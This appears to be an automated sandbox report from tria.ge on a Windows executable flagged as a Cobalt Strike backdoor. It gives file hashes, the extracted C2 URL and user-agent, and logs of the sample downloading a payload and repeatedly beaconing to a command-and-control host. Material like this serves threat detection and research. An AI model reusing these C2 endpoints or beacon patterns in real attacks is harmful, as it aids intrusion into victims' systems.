Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

3

df6eff9599...cs.exe

windows7-x64

10

df6eff9599...cs.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    142s
  • max time network
    141s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    16/06/2024, 07:09 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe

  • Size

    19KB

  • MD5

    df6eff95999e5095f1a6a243a57ca600

  • SHA1

    3904f817c5ddb9d13efde0e711204d659b9d9151

  • SHA256

    8591414faeeaf0c711df8c5bc16b63dbe5012424582de92ffc8183630ff877e6

  • SHA512

    ad01a17c1c201294361cef2418944209f9b668b9d34af21f566aaf1199e988505417384e25c4ab189c54e63ab42e8037a196467bcaceb1913da0ba4bf51019f3

  • SSDEEP

    192:OV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/22VWF8qa1Dojjgi:YqaCF31cix+Dc4zjUFF46gi

Score
10/10
cobaltstrikebackdoortrojan

Malware Config

Extracted

Family

cobaltstrike

C2

http://miku.kirtoly.cc:443/Zc4l

Attributes
  • user_agent

    User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08 Host: miku.kirtoly.cc

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe"
    1⤵
      PID:2080

    Network

    • flag-us
      DNS
      miku.kirtoly.cc
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      miku.kirtoly.cc
      IN A
      Response
      miku.kirtoly.cc
      IN CNAME
      www.shopify.com
      www.shopify.com
      IN A
      185.146.173.20
    • flag-ca
      GET
      https://miku.kirtoly.cc/Zc4l
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /Zc4l HTTP/1.1
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Host: miku.kirtoly.cc
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:09:52 GMT
      Content-Type: application/octet-stream
      Content-Length: 296007
      Connection: keep-alive
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QreGKU0%2BeL7jt3ZcvQmkhbqV0iCMeyl%2BkmlZP0OVK4g1532uGsaYfCa%2Fl%2B6jq1mj8ULtsoMzFkZuArrAWsajS5fQZNJgJSV9Vs3%2BgfZy3UTZ6c9vGalzbxk3Fzuq%2FvANarE%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fa082c146389-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-us
      DNS
      cs.m1ku.cloudns.be
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      cs.m1ku.cloudns.be
      IN A
      Response
      cs.m1ku.cloudns.be
      IN A
      185.146.173.20
    • flag-ca
      GET
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:09:55 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W2dOiQqa%2BSfevycEKlkYwoq%2B3F627ERMHbB8oPC0GllpK%2BGDyHHuMbznwTxbW8aFpcz%2BWEQubLH6%2Ffc3Zq%2BOwSEfh1DPZFNooyKkxjXMtfmJBdRi88g9A8SDNSgXHNoJgJIKr9s%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fa1c9987408a-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-ca
      GET
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:10:27 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=deqWUfbPpVksai%2F%2BAJmSRWKNtwAOjefIQpjXPJKrwQIoY%2ByPEG9T7T5pu8Mj%2BPyipnTJkym2lTU71xqqYNbwgsdE%2F0g%2FEN9kMzmJE83VUqDh%2BqgUwd4rhzBsEp0wRdtXg9EChOQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fae1dfe994a3-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-ca
      GET
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:10:58 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0tREyb7jMSysc8l5MM9DOgPLrwOaAuC%2F68AX28bdR3q9yAxlqsm%2Bcnf%2BguPc7Bouq1BWTVS2Ewio%2FcD%2BVvD%2FX%2FpFOXpcHfghlcS8bZobAuHatXu%2FWOuQU89hTO99YlMa4dN0Zaw%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fba80ade35dd-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-ca
      GET
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:11:30 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wKS8X8qzrYDuQtIs2aS8l9GWUYCDetK1Eh7VWjjA6eiDf5HqOT4fbycv%2B%2BqwmeycdqbKrpZSlXRVe3fvPoOR2QrdVZGSP55istWumWhuCPOBH%2FiJJqrRL8DcsZjUAk6vTlnYl8w%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fc6dac564133-LHR
      alt-svc: h3=":443"; ma=86400
    • flag-ca
      GET
      https://cs.m1ku.cloudns.be/include/template/isx.php
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      Remote address:
      185.146.173.20:443
      Request
      GET /include/template/isx.php HTTP/1.1
      Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
      Referer: http://www.google.com
      Accept-Language: en-us,en;q=0.5
      Cookie: IBpTAuXWuiM3Tulbikz56XWUhZNYY2tKhX82RIioBx/eDVrKdxywWQt9febvgAWk5xQIa+rKO4Dchxb5wCWBPSutWZZlmxrgB/VnhOTHTOYazWah6Bn9x/F5/dGHmJ7XEm+I7Cs9cF5uLxhuCSxtRNaWxh2xsQdabGImADr7ij0=
      Host: cs.m1ku.cloudns.be
      User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2) Java/1.5.0_08
      Connection: Keep-Alive
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Date: Sun, 16 Jun 2024 07:12:02 GMT
      Content-Type: text/html
      Transfer-Encoding: chunked
      Connection: keep-alive
      X-Powered-By: PHP/5.3.28
      Cache-Control: no-cache
      CF-Cache-Status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LamQGkJu4vMlPZUIWWDRyDZprBl2uMiQM7FWhwb6Z9bb7Ac9i%2FRZbScEk57YwAVT98EOt9k%2FwEHeW8s%2B02YUlRJniQax%2Bp9qhbB6%2BtmT1Dk6Wk9duX3PbhNbzMVRTFdrDvn5P4Y%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8948fd334a0377a8-LHR
      alt-svc: h3=":443"; ma=86400
    • 185.146.173.20:443
      https://miku.kirtoly.cc/Zc4l
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      6.8kB
       316.3kB
       136
      259

      HTTP Request

      GET https://miku.kirtoly.cc/Zc4l

      HTTP Response

      200
    • 185.146.173.20:443
      https://cs.m1ku.cloudns.be/include/template/isx.php
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      1.3kB
       4.4kB
       9
      10

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443
      https://cs.m1ku.cloudns.be/include/template/isx.php
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      1.3kB
       4.4kB
       9
      10

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443
      https://cs.m1ku.cloudns.be/include/template/isx.php
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      1.3kB
       4.4kB
       9
      10

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443
      https://cs.m1ku.cloudns.be/include/template/isx.php
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      1.1kB
       1.2kB
       6
      6

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 185.146.173.20:443
      https://cs.m1ku.cloudns.be/include/template/isx.php
      tls, http
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      1.2kB
       4.4kB
       7
      9

      HTTP Request

      GET https://cs.m1ku.cloudns.be/include/template/isx.php

      HTTP Response

      200
    • 8.8.8.8:53
      miku.kirtoly.cc
      dns
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      61 B
       106 B
       1
      1

      DNS Request

      miku.kirtoly.cc

      DNS Response

      185.146.173.20

    • 8.8.8.8:53
      cs.m1ku.cloudns.be
      dns
      df6eff95999e5095f1a6a243a57ca600_NeikiAnalytics.exe
      64 B
       80 B
       1
      1

      DNS Request

      cs.m1ku.cloudns.be

      DNS Response

      185.146.173.20

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/2080-0-0x0000000000020000-0x0000000000021000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2080-1-0x0000000003E70000-0x0000000004270000-memory.dmp

      Filesize

      4.0MB

      Download

    • memory/2080-2-0x00000000033B0000-0x0000000003406000-memory.dmp

      Filesize

      344KB

      Download

    • memory/2080-3-0x0000000000400000-0x000000000040C000-memory.dmp

      Filesize

      48KB

      Download

    • memory/2080-5-0x00000000033B0000-0x0000000003406000-memory.dmp

      Filesize

      344KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.